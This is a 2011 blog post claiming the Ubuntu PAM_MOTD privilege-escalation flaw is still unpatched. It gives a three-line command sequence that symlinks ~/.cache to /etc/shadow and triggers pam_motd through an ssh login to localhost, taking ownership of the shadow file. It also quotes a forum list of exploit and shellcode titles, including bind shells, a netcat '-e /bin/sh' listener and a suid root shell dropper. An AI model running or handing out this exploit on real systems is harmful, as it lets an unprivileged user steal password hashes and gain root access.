Thursday, December 29, 2011

Ubuntu root access

The PAM_MOTD exploit for Ubuntu is still not patched…

rm -rf ~/.cache;
ln -s /etc/shadow ~/.cache;
ssh localhost (trigger pam_motd by re-logging in and you’ll own /etc/shadow)



In a recent thread is was suggested that Linux was as vulnerable as Windows is and as proof a list of exploits were given that were published on almost the same day as the discussion. Here is the list that was given:
Quote

2011-07-08 Ubuntu PAM MOTD File Tampering (Privilege Escalation)
2011-07-05 linux/x86 polymorphic Drop suid shell root /tmp/.hiddenshell 161 bytes
2011-07-05 linux/x86 bind sh@64533 97 bytes
2011-07-05 linux/x86 lynx polymorphic shellcode 84 bytes
2011-07-05 linux/x86 setreuid(0,0) execve(“/bin/sh”,NULL,NULL) encoded 62 bytes
2011-07-05 linux/x86 /proc/sys/kernel/randomize_va_space SUB encoded 111 bytes
2011-07-05 linux/x86 bind port to 6678 XOR encoded polymorphic shellcode 125 bytes
2011-07-05 linux/x86 nc -lp 31337 -e /bin/sh polymorphic shellcode 91 bytes

Cheers,

Ujjwal Soni

No comments: